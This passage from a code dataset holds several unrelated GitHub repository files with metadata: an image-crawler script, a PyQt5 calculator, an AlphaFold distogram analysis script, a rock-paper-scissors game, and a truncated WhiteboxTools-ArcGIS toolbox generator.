"src_encoding": "UTF-8",
"text": "import requests\r\nimport urllib.request\r\nimport os\r\nfrom bs4 import BeautifulSoup\r\nfrom google_images_download import google_images_download\r\n\r\ndef spider(txtpath):\r\n productlist = [] \r\n file = open(txtpath, 'r')\r\n exitList = file.readlines()\r\n file.close()\r\n \r\n productlist.extend(exitList)\r\n page = 0\r\n max_pages = len(productlist)\r\n response = google_images_download.googleimagesdownload()\r\n while page < max_pages:\r\n aux = productlist[page].rstrip()\r\n #define search params:\r\n search_params = {\r\n \"keywords\": aux,\r\n \"limit\": 15,\r\n \"size\": \"large\",\r\n \"print_urls\": True,\r\n \"output_directory\": r\"C:\\Users\\Agustin\\Desktop\\Crawler\"\r\n }\r\n absolute_image_paths = response.download(search_params)\r\n print(absolute_image_paths)\r\n page += 1 \r\n\r\n \r\ntxtpath = r'C:\\Users\\Agustin\\Desktop\\Crawler\\Input.txt'\r\nspider(txtpath)"
}
] | 1 |
Rom-Phirunronnakon/rom101 | https://github.com/Rom-Phirunronnakon/rom101 | a3633d4b5d3f6aff24a1510fcc97bd9e47032911 | 32f429c491fd232136f2319383fa842483e7e3b5 | eb18ac99470b312639451ae8ad38ac88a3089bc2 | refs/heads/main | 2023-08-31T04:26:18.724184 | 2021-10-29T10:17:15 | 2021-10-29T10:17:15 | 417,072,032 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5780637860298157,
"alphanum_fraction": 0.6059737205505371,
"avg_line_length": 43.535823822021484,
"blob_id": "c76e4cfc34f30e52a1ea70f6de3ef6a9f14e888a",
"content_id": "162d064eb7c254b036597b83d6a192d97d812d60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14296,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 321,
"path": "/calculator.py",
"repo_name": "Rom-Phirunronnakon/rom101",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'calculator.ui'\n#\n# Created by: PyQt5 UI code generator 5.15.4\n#\n# WARNING: Any manual changes made to this file will be lost when pyuic5 is\n# run again. Do not edit this file unless you know what you are doing.\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nstart = \"0\"\nfirst = 0\nsecond = 0\noperation = \"\"\nmem = 0\nnew = 0\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(213, 343)\n MainWindow.setSizeIncrement(QtCore.QSize(0, 0))\n MainWindow.setBaseSize(QtCore.QSize(0, 0))\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setBaseSize(QtCore.QSize(0, 0))\n self.centralwidget.setObjectName(\"centralwidget\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(10, 10, 191, 51))\n font = QtGui.QFont()\n font.setPointSize(28)\n self.label.setFont(font)\n self.label.setToolTipDuration(-1)\n self.label.setLayoutDirection(QtCore.Qt.RightToLeft)\n self.label.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.label.setFrameShadow(QtWidgets.QFrame.Plain)\n self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.label.setObjectName(\"label\")\n self.memoclear = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"MC\"))\n self.memoclear.setGeometry(QtCore.QRect(10, 70, 31, 31))\n self.memoclear.setObjectName(\"memoclear\")\n self.memorecall = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"MR\"))\n self.memorecall.setGeometry(QtCore.QRect(50, 70, 31, 31))\n self.memorecall.setObjectName(\"memorecall\")\n self.memosave = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"MS\"))\n self.memosave.setGeometry(QtCore.QRect(90, 70, 31, 31))\n self.memosave.setObjectName(\"memosave\")\n self.addmemo = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"M+\"))\n self.addmemo.setGeometry(QtCore.QRect(130, 70, 31, 31))\n self.addmemo.setObjectName(\"addmemo\")\n self.minusmemo = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"M-\"))\n self.minusmemo.setGeometry(QtCore.QRect(170, 70, 31, 31))\n self.minusmemo.setObjectName(\"minusmemo\")\n self.goback = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"GB\"))\n self.goback.setGeometry(QtCore.QRect(10, 110, 31, 31))\n self.goback.setObjectName(\"goback\")\n self.plusminus = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"PM\"))\n self.plusminus.setGeometry(QtCore.QRect(130, 110, 31, 31))\n self.plusminus.setObjectName(\"plusminus\")\n self.squareroot = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.square_it())\n self.squareroot.setGeometry(QtCore.QRect(170, 110, 31, 31))\n self.squareroot.setObjectName(\"squareroot\")\n self.clearinput = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"CE\"))\n self.clearinput.setGeometry(QtCore.QRect(50, 110, 31, 31))\n self.clearinput.setObjectName(\"clearinput\")\n self.clear = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"C\"))\n self.clear.setGeometry(QtCore.QRect(90, 110, 31, 31))\n self.clear.setObjectName(\"clear\")\n self.seven = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"7\"))\n self.seven.setGeometry(QtCore.QRect(10, 150, 31, 31))\n 
self.seven.setObjectName(\"seven\")\n self.divide = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.divide_it())\n self.divide.setGeometry(QtCore.QRect(130, 150, 31, 31))\n self.divide.setObjectName(\"divide\")\n self.percent = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.percent_it())\n self.percent.setGeometry(QtCore.QRect(170, 150, 31, 31))\n self.percent.setObjectName(\"percent\")\n self.eight = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"8\"))\n self.eight.setGeometry(QtCore.QRect(50, 150, 31, 31))\n self.eight.setObjectName(\"eight\")\n self.nine = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"9\"))\n self.nine.setGeometry(QtCore.QRect(90, 150, 31, 31))\n self.nine.setObjectName(\"nine\")\n self.four = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"4\"))\n self.four.setGeometry(QtCore.QRect(10, 190, 31, 31))\n self.four.setObjectName(\"four\")\n self.multiply = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.multiply_it())\n self.multiply.setGeometry(QtCore.QRect(130, 190, 31, 31))\n self.multiply.setObjectName(\"multiply\")\n self.equal = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.equal_to())\n self.equal.setGeometry(QtCore.QRect(170, 230, 31, 71))\n self.equal.setObjectName(\"equal\")\n self.five = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"5\"))\n self.five.setGeometry(QtCore.QRect(50, 190, 31, 31))\n self.five.setObjectName(\"five\")\n self.six = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"6\"))\n self.six.setGeometry(QtCore.QRect(90, 190, 31, 31))\n self.six.setObjectName(\"six\")\n self.zero = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"0\"))\n self.zero.setGeometry(QtCore.QRect(10, 270, 71, 31))\n self.zero.setObjectName(\"zero\")\n self.add = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.add_it())\n self.add.setGeometry(QtCore.QRect(130, 270, 31, 31))\n self.add.setObjectName(\"add\")\n self.point = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\".\"))\n self.point.setGeometry(QtCore.QRect(90, 270, 31, 31))\n self.point.setObjectName(\"point\")\n self.two = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"2\"))\n self.two.setGeometry(QtCore.QRect(50, 230, 31, 31))\n self.two.setObjectName(\"two\")\n self.one = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"1\"))\n self.one.setGeometry(QtCore.QRect(10, 230, 31, 31))\n self.one.setObjectName(\"one\")\n self.minus = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.minus_it())\n self.minus.setGeometry(QtCore.QRect(130, 230, 31, 31))\n self.minus.setObjectName(\"minus\")\n self.three = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"3\"))\n self.three.setGeometry(QtCore.QRect(90, 230, 31, 31))\n self.three.setObjectName(\"three\")\n self.oneover = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"OO\"))\n self.oneover.setGeometry(QtCore.QRect(170, 190, 31, 31))\n self.oneover.setObjectName(\"oneover\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 213, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n 
self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n def press_it(self, pressed):\n global start\n global first\n global second\n global new\n if pressed == \"C\":\n start = \"0\"\n first = 0\n self.label.setText(\"%.9s\" %start)\n elif pressed == \"CE\":\n start = \"0\"\n second = 0\n self.label.setText(\"%.9s\" %start)\n elif pressed == \"PM\":\n start = str(float(start)*(-1))\n self.label.setText(\"%.9s\" %start)\n elif pressed == \"GB\":\n if len(start) > 1:\n start = start[:-1]\n self.label.setText(\"%.9s\" %start)\n elif len(start) == 1:\n start = \"0\"\n self.label.setText(\"%.9s\" %start)\n elif pressed == \"OO\":\n if start != \"0\":\n start = str(1/float(start))\n self.label.setText(\"%.9s\" %start)\n elif pressed == \".\":\n if \".\" in self.label.text():\n pass\n else:\n start += pressed\n self.label.setText(\"%.9s\" %start)\n elif start == \"0\":\n start = pressed\n self.label.setText(\"%.9s\" %start)\n else:\n start += pressed\n self.label.setText(\"%.9s\" %start)\n def add_it(self):\n global start\n global first\n global operation\n global count_point\n count_point = 0\n first = float(start)\n operation = \"+\"\n self.label.setText(\"\")\n start = \"0\"\n def minus_it(self):\n global start\n global first\n global operation\n global count_point\n count_point = 0\n first = float(start)\n operation = \"-\"\n self.label.setText(\"\")\n start = \"0\"\n def multiply_it(self):\n global start\n global first\n global operation\n global count_point\n count_point = 0\n first = float(start)\n operation = \"*\"\n self.label.setText(\"\")\n start = \"0\"\n def divide_it(self):\n global start\n global first\n global operation\n global count_point\n count_point = 0\n first = float(start)\n operation = \"/\"\n self.label.setText(\"\")\n start = \"0\"\n def equal_to(self):\n global start\n global first\n global second\n global count_point\n second = float(start)\n if operation == \"+\":\n self.label.setText(\"%.9s\" %str(first+second))\n start = \"0\"\n first = 0\n second = 0\n count_point = 0\n elif operation == \"-\":\n self.label.setText(\"%.9s\" %str(first-second))\n start = \"0\"\n first = 0\n second = 0\n count_point = 0\n elif operation == \"*\":\n self.label.setText(\"%.9s\" %str(first*second))\n start = \"0\"\n first = 0\n second = 0\n count_point = 0\n elif operation == \"/\" and second != 0:\n self.label.setText(\"%.9s\" %str(first/second))\n start = \"0\"\n first = 0\n second = 0\n count_point = 0\n def square_it(self):\n global start\n if float(start) >= 0:\n self.label.setText(\"%.9s\" %str(float(start)**0.5))\n start = \"0\"\n count_point = 0\n def memory(self, memcom):\n global mem\n global start\n if memcom == \"M+\":\n mem += float(start)\n start = \"\"\n self.label.setText(start)\n elif memcom == \"M-\":\n mem -= float(start)\n start = \"\"\n self.label.setText(start)\n elif memcom == \"MC\":\n mem = 0\n elif memcom == \"MR\":\n self.label.setText(str(mem))\n elif memcom == \"MS\":\n mem = mem \n def percent_it(self):\n global operation\n if operation == \"+\":\n self.label.setText(\"%.9s\" %str(first*(1+float(start)/100)))\n operation = \"\"\n elif operation == \"-\":\n self.label.setText(\"%.9s\" %str(first*(1-float(start)/100)))\n operation = \"\"\n elif operation == \"*\":\n self.label.setText(\"%.9s\" %str(first*float(start)/100))\n operation = \"\"\n elif operation == \"/\":\n self.label.setText(\"%.9s\" %str(first*100/float(start)))\n operation = 
\"\"\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Calculator\"))\n self.label.setText(_translate(\"MainWindow\", \"0\"))\n self.memoclear.setText(_translate(\"MainWindow\", \"MC\"))\n self.memorecall.setText(_translate(\"MainWindow\", \"MR\"))\n self.memosave.setText(_translate(\"MainWindow\", \"MS\"))\n self.addmemo.setText(_translate(\"MainWindow\", \"M+\"))\n self.minusmemo.setText(_translate(\"MainWindow\", \"M-\"))\n self.goback.setText(_translate(\"MainWindow\", \"<--\"))\n self.plusminus.setText(_translate(\"MainWindow\", \"+/-\"))\n self.squareroot.setText(_translate(\"MainWindow\", \"sqrt\"))\n self.clearinput.setText(_translate(\"MainWindow\", \"CE\"))\n self.clear.setText(_translate(\"MainWindow\", \"C\"))\n self.seven.setText(_translate(\"MainWindow\", \"7\"))\n self.divide.setText(_translate(\"MainWindow\", \"/\"))\n self.percent.setText(_translate(\"MainWindow\", \"%\"))\n self.eight.setText(_translate(\"MainWindow\", \"8\"))\n self.nine.setText(_translate(\"MainWindow\", \"9\"))\n self.four.setText(_translate(\"MainWindow\", \"4\"))\n self.multiply.setText(_translate(\"MainWindow\", \"*\"))\n self.equal.setText(_translate(\"MainWindow\", \"=\"))\n self.five.setText(_translate(\"MainWindow\", \"5\"))\n self.six.setText(_translate(\"MainWindow\", \"6\"))\n self.zero.setText(_translate(\"MainWindow\", \"0\"))\n self.add.setText(_translate(\"MainWindow\", \"+\"))\n self.point.setText(_translate(\"MainWindow\", \".\"))\n self.two.setText(_translate(\"MainWindow\", \"2\"))\n self.one.setText(_translate(\"MainWindow\", \"1\"))\n self.minus.setText(_translate(\"MainWindow\", \"-\"))\n self.three.setText(_translate(\"MainWindow\", \"3\"))\n self.oneover.setText(_translate(\"MainWindow\", \"1/x\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n"
}
] | 1 |
bjornwallner/AF_flex | https://github.com/bjornwallner/AF_flex | 3633bbcb8f16e1eef875f132582f088cdae11072 | 6b5bacc2899a4aa62d974f07e1626b3d8ad6bd78 | 2f11805abdc6594a419e5903ad0b8e026ffe1d77 | refs/heads/main | 2023-08-03T01:50:56.934643 | 2021-09-30T10:12:47 | 2021-09-30T10:12:47 | 411,991,814 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5701708793640137,
"alphanum_fraction": 0.5833764672279358,
"avg_line_length": 23.5732479095459,
"blob_id": "593af75a392b5a4663ac5defa7fcb7b81616cfe9",
"content_id": "2a78dd86605998cd3dcb7d0d1169b8d69892006a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3862,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 157,
"path": "/distogram.py",
"repo_name": "bjornwallner/AF_flex",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\nfrom numpy import NaN, Inf, arange, isscalar, asarray, array\n\ndef peakdet(v, delta, x = None):\n \"\"\"\n Converted from MATLAB script at http://billauer.co.il/peakdet.html\n \n Returns two arrays\n \n function [maxtab, mintab]=peakdet(v, delta, x)\n %PEAKDET Detect peaks in a vector\n % [MAXTAB, MINTAB] = PEAKDET(V, DELTA) finds the local\n % maxima and minima (\"peaks\") in the vector V.\n % MAXTAB and MINTAB consists of two columns. Column 1\n % contains indices in V, and column 2 the found values.\n % \n % With [MAXTAB, MINTAB] = PEAKDET(V, DELTA, X) the indices\n % in MAXTAB and MINTAB are replaced with the corresponding\n % X-values.\n %\n % A point is considered a maximum peak if it has the maximal\n % value, and was preceded (to the left) by a value lower by\n % DELTA.\n \n % Eli Billauer, 3.4.05 (Explicitly not copyrighted).\n % This function is released to the public domain; Any use is allowed.\n \n \"\"\"\n maxtab = []\n mintab = []\n \n if x is None:\n x = arange(len(v))\n \n v = asarray(v)\n \n if len(v) != len(x):\n sys.exit('Input vectors v and x must have same length')\n \n if not isscalar(delta):\n sys.exit('Input argument delta must be a scalar')\n \n if delta <= 0:\n sys.exit('Input argument delta must be positive')\n \n mn, mx = Inf, -Inf\n mnpos, mxpos = NaN, NaN\n \n lookformax = True\n \n for i in arange(len(v)):\n this = v[i]\n if this > mx:\n mx = this\n mxpos = x[i]\n if this < mn:\n mn = this\n mnpos = x[i]\n \n if lookformax:\n if this < mx-delta:\n maxtab.append((mxpos, mx))\n mn = this\n mnpos = x[i]\n lookformax = False\n else:\n if this > mn+delta:\n mintab.append((mnpos, mn))\n mx = this\n mxpos = x[i]\n lookformax = True\n\n return array(maxtab), array(mintab)\n\n\n# In[22]:\n\n\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\n\ndef softmax(x):\n f_x = np.exp(x) / np.sum(np.exp(x))\n return f_x\ndef expit(x):\n\n f_x=1/(1+np.exp(-x)) \n return f_x\n\npickle_file='result_model_1_msas1_chainbreak_offset200_recycles3_1.pkl'\nresults=pickle.load(open(pickle_file,'rb'))\nprint(results['distogram'].keys())\nbin_edges=results['distogram']['bin_edges']\nbin_size=bin_edges[1]-bin_edges[0]\n#convert the bin_edges to bin_centers\nprint(bin_edges)\nx=bin_edges+bin_size/2\nprint(x)\nprint(bin_size)\n#Add the first bin center to the begining of x to complete the conversion\nfirst_bin=bin_edges[0]-bin_size/2\nx=np.insert(x,0,first_bin)\nprint(bin_edges)\n\n\n# In[35]:\n\n\ndistogram=results['distogram']['logits']\nprint(results['distogram']['logits'].shape)\nprint(len(x))\n#Took a random position that I know was in contact just to get something\npos1=5\npos2=28\ny=distogram[pos1-1][pos2-1]\n#the distogram are logits and need to be converted to probablity using softmax\n#\nprob=softmax(y)\n#prob2=expit(y)\n#print(y)\n#print(prob)\nplt.plot(x,prob)\n#plt.plot(x,prob2)\n#plt.plot(x,y_S)\nplt.show()\n(maxima,minima)=peakdet(prob,0.03,x)\nmaxima\n\n\n# In[51]:\n\n\n#Example Search for all maximas\nN=distogram.shape[0] #this is the length of the pdb\n\nfor i in range(N):\n for j in range(N):\n if j<=i: #skipping symmetric pairs\n continue\n prob=softmax(distogram[i][j])\n #prob=expit(distogram[i][j])\n (maxima,minima)=peakdet(prob,0.03,x)\n n=len(maxima)\n if(n >1):\n print(f'Found {n} maxima for pair {i+1},{j+1}: {maxima.flatten().tolist()}')\n #print(len(maxima))\n print(maxima.shape)\n\n\n# In[ ]:\n\n\n\n\n"
}
] | 1 |
shivamtiwari12032001/Rock-Paper_Scissor | https://github.com/shivamtiwari12032001/Rock-Paper_Scissor | 7b3ad3f191d23a5db1e2cb8c841bef624ce3a483 | 31ae2c24ac441e39eab19223e06ee2c15197541f | c02b58b038d8e73ee6278189171cc4fc59a4ab4b | refs/heads/master | 2023-03-14T23:34:59.756529 | 2021-03-22T14:26:49 | 2021-03-22T14:26:49 | 349,501,580 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5870535969734192,
"alphanum_fraction": 0.5870535969734192,
"avg_line_length": 28.933332443237305,
"blob_id": "fbcd2b8d1e81f5a4d23f4a7b607f0d54c442d264",
"content_id": "3fcae9d2a4b86af2fe6673754b105c77157b1d51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 448,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 15,
"path": "/main.py",
"repo_name": "shivamtiwari12032001/Rock-Paper_Scissor",
"src_encoding": "UTF-8",
"text": "import random\ndef play():\n user=input(\"enter your choice?? 'r' for rock 's' for scissor or 'p' for paper:\\n \")\n computer=random.choice([\"r\",\"s\",\"p\"])\n if user==computer:\n return \"It\\\"s tie\"\n if is_win(user,computer):\n return \"You won\"\n return \"you lost\"\n\n\ndef is_win(user,opponent):\n if(user==\"r\" and opponent==\"s\")or (user==\"p\" and opponent==\"r\") or (user==\"s\" and opponent==\"p\"):\n return True\nprint(play())"
},
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 20,
"blob_id": "2c7e5bc88d0a5eff08a253376c53955cf1b0e2c1",
"content_id": "fedf23021efd0375f1672f932895c29f6d68efe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "shivamtiwari12032001/Rock-Paper_Scissor",
"src_encoding": "UTF-8",
"text": "# Rock-Paper_Scissor\n"
}
] | 2 |
TrendingTechnology/WhiteboxTools-ArcGIS | https://github.com/TrendingTechnology/WhiteboxTools-ArcGIS | 77f70ab029d8002ac2d3590baac7bff245820664 | df72dc226e4c5bb9870a79c8af2cb8d2f78ed1f0 | 44ab3b2e14d18c987cc97199585a58f0c27a26d8 | refs/heads/master | 2023-06-19T13:32:43.687641 | 2021-07-20T19:13:32 | 2021-07-20T19:13:32 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.547406792640686,
"alphanum_fraction": 0.5500813722610474,
"avg_line_length": 36.938236236572266,
"blob_id": "1f976f750f45d185ea564803ede5ac2469dc494f",
"content_id": "07a6a5db3f6c9ed14a06e89bce6e705456aa8035",
"detected_licenses": [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25798,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 680,
"path": "/WBT/PRE/automation.py",
"repo_name": "TrendingTechnology/WhiteboxTools-ArcGIS",
"src_encoding": "UTF-8",
"text": "\n##################################################################\n# Steps for updating WhiteboxTools-ArcGIS\n# Step 1 - Delete the existing develop branch: git branch -D develop \n# Step 2 - Create a new develop branch: git checkout -b develop\n# Step 3 - Delete the old WhiteboxTools_win_amd64.zip in the root folder if needed\n# Step 4 - Run automation.py\n# Step 5 - Commit and push changes\n# Step 6 - Merge pull request on GitHub\n# Step 7 - Switch to master branch and pull updates: git checkout master | git pull\n##################################################################\n\nimport os \nimport re\nimport shutil\nimport ast\nimport whitebox\nimport urllib.request\nfrom zipfile import ZipFile\n\nwbt = whitebox.WhiteboxTools()\n\ndef to_camelcase(name):\n '''\n Convert snake_case name to CamelCase name \n '''\n return ''.join(x.title() for x in name.split('_'))\n\ndef to_label(name):\n '''\n Convert snake_case name to Title case label \n '''\n return ' '.join(x.title() for x in name.split('_'))\n\ndef to_snakecase(name):\n '''\n Convert CamelCase name to snake_case name \n '''\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\ndef write_header(file_path, tool_list):\n '''\n Generate Python script header for ArcGIS Python Toolbox \n '''\n f_header = open(file_path, \"w\")\n f_header.write(\"import arcpy\\n\")\n f_header.write(\"import os\\n\")\n f_header.write(\"import webbrowser\\n\")\n f_header.write(\"from WBT.whitebox_tools import WhiteboxTools\\n\")\n f_header.write('if sys.version_info < (3, 0):\\n')\n f_header.write(' from StringIO import StringIO\\n')\n f_header.write('else:\\n')\n f_header.write(' from io import StringIO\\n\\n')\n f_header.write(\"wbt = WhiteboxTools()\\n\")\n # ValueList (Dropdown List) for About WhiteboxTools functions (e.g., Run Tool, View Code)\n f_header.write(\"tool_labels = []\\n\\n\") \n tool_list.sort()\n for tool in tool_list:\n f_header.write('tool_labels.append(\"{}\")\\n'.format(tool))\n f_header.write(\"\\n\\n\")\n f_header.close()\n\n\ndef get_tool_params(tool_name):\n '''\n Convert tool parameters output string to a dictionary \n '''\n out_str = wbt.tool_parameters(tool_name)\n start_index = out_str.index('[') + 1\n if \"EXE_NAME\" in out_str:\n end_index = out_str.rfind(\"]\") \n else:\n end_index = len(out_str.strip()) - 2\n params = out_str[start_index : end_index]\n if \"EXE_NAME\" in out_str:\n sub_params = params.split('{\"default_value\"')\n else:\n sub_params = params.split('{\"name\"')\n param_list = []\n\n for param in sub_params:\n param = param.strip()\n if len(param) > 0:\n if \"EXE_NAME\" in out_str:\n if not param.endswith('},'):\n item = '\"default_value\"' + param[:-1] + ','\n else:\n item = '\"default_value\"' + param[:-2] + ','\n name_start = item.find('\"name\"')\n name_end = item.find(\",\", name_start) + 1\n name = item[name_start: name_end]\n flags_start = item.find('\"flags\"')\n flags_end = item.find('],', flags_start) + 2\n flags = item[flags_start: flags_end]\n desc_start = item.find('\"description\"')\n desc_end = item.find('\",', desc_start) + 2\n desc = item[desc_start: desc_end]\n ptype_start = item.find('\"parameter_type\"')\n ptype_end = len(item) + 1\n ptype = item[ptype_start: ptype_end]\n default_start = item.find('\"default_value\"')\n default_end = item.find(',', default_start) + 1\n default = item[default_start: default_end]\n optional_start = item.find('\"optional\"')\n optional_end = item.find(',', optional_start) + 1\n 
optional = item[optional_start: optional_end]\n item = name + flags + desc + ptype + default + optional\n else:\n item = '\"name\"' + param\n item = item[ : item.rfind(\"}\")].strip()\n\n param_list.append(item)\n\n params_dict = {}\n for item in param_list:\n param_dict = {}\n item = item.replace(\" (optional)\", \"\")\n index_name = item.find(\"name\")\n index_flags = item.find(\"flags\")\n index_description = item.find(\"description\")\n index_parameter_type = item.find(\"parameter_type\")\n index_default_value = item.find(\"default_value\")\n index_optional = item.find(\"optional\")\n\n name = item[index_name - 1 : index_flags - 2].replace('\"name\":', '')\n name = name.replace('\"', '')\n param_dict['name'] = name\n\n flags = item[index_flags - 1 : index_description -2].replace('\"flags\":', '')\n \n if (\"\\\"-i\\\"\" in flags) and (\"--inputs\" in flags) :\n flags = \"inputs\"\n elif (\"\\\"-i\\\"\" in flags) and (\"--input\" in flags) and (\"--dem\" in flags) and (tool_name.lower() != 'sink'):\n flags = \"dem\" \n elif (\"\\\"-i\\\"\" in flags) and (\"--input\" in flags) :\n flags = \"i\"\n elif flags.count(\"--\") == 1 :\n flags = flags.split('--')[1][: -2]\n elif flags.count(\"--\") == 2:\n flags = flags.split('--')[2][: -2]\n else:\n flags = flags.split('-')[1][: -2]\n\n param_dict['flags'] = flags\n\n desc = item[index_description - 1 : index_parameter_type - 2].replace('\"description\":', '')\n desc = desc.replace('\"', '')\n param_dict['description'] = desc\n\n param_type = item[index_parameter_type - 1 : index_default_value - 2].replace('\"parameter_type\":', '')\n try:\n param_type = ast.literal_eval(param_type)\n except:\n pass\n\n param_dict['parameter_type'] = param_type\n\n default_value = item[index_default_value - 1 : index_optional - 2].replace('\"default_value\":', '')\n param_dict['default_value'] = default_value\n\n optional = item[index_optional - 1 :].replace('\"optional\":', '')\n param_dict['optional'] = optional\n\n params_dict[flags] = param_dict\n\n # if tool_name == 'Divide':\n # print(\"start debugging\")\n\n return params_dict\n\n\n# def get_param_types(tools):\n# '''\n# Get unique parameter types \n# '''\n# parameter_types = []\n# for tool in tools:\n# params = tools[tool]['parameters']\n# for param in params:\n# param_type = params[param]['parameter_type']\n# if param_type not in parameter_types:\n# parameter_types.append(param_type)\n# return parameter_types\n\n\ndef generate_tool_template(tool):\n '''\n Generate function block of each tool for the toolbox \n '''\n tool_params = []\n for index, item in enumerate(tool['parameters']):\n if index < 0:\n tool_params.append(item)\n else:\n item_dup = \"{}={}\".format(item, item)\n tool_params.append(item_dup)\n\n lines = []\n lines.append('class {}(object):\\n'.format(tool['name']))\n lines.append(' def __init__(self):\\n')\n lines.append(' self.label = \"{}\"\\n'.format(tool['label']))\n lines.append(' self.description = \"{}\"\\n'.format(tool['description']))\n lines.append(' self.category = \"{}\"\\n\\n'.format(tool['category']))\n lines.append(' def getParameterInfo(self):\\n')\n # Loop through parameters \n lines.append(define_tool_params(tool['parameters']))\n lines.append(' return params\\n\\n')\n lines.append(' def updateParameters(self, parameters):\\n')\n lines.append(' return\\n\\n')\n lines.append(' def updateMessages(self, parameters):\\n')\n lines.append(' for param in parameters:\\n')\n lines.append(' param_str = param.valueAsText\\n')\n lines.append(' if param_str is not None:\\n')\n 
lines.append(' try:\\n')\n lines.append(' desc = arcpy.Describe(param_str)\\n')\n lines.append(' if (\".gdb\\\\\\\\\" in desc.catalogPath) or (\".mdb\\\\\\\\\" in desc.catalogPath):\\n')\n lines.append(' param.setErrorMessage(\"Datasets stored in a Geodatabase are not supported.\")\\n')\n lines.append(' except:\\n')\n lines.append(' param.clearMessage()\\n')\n lines.append(' return\\n\\n')\n lines.append(' def execute(self, parameters, messages):\\n')\n # Access parameters throught parameters[x].valueAsText\n lines.append(define_execute(tool['parameters']))\n # redirect standard output to tool dialogue\n lines.append(' old_stdout = sys.stdout\\n')\n lines.append(' result = StringIO()\\n')\n lines.append(' sys.stdout = result\\n')\n\n # line = ' wbt.{}({})\\n'.format(to_snakecase(tool['name']), ', '.join(tool['parameters']).replace(\", class,\", \", cls,\"))\n line = ' wbt.{}({})\\n'.format(to_snakecase(tool['name']), ', '.join(tool_params).replace(\", class=class,\", \", cls=cls,\"))\n\n # Deal with name conflict with reserved Python functions (and, or, not)\n if tool['name'] == \"And\":\n line = line.replace(\"and\", \"And\")\n elif tool['name'] == \"Or\":\n line = line.replace(\"or\", \"Or\")\n elif tool['name'] == \"Not\":\n line = line.replace(\"not\", \"Not\")\n lines.append(line)\n lines.append(' sys.stdout = 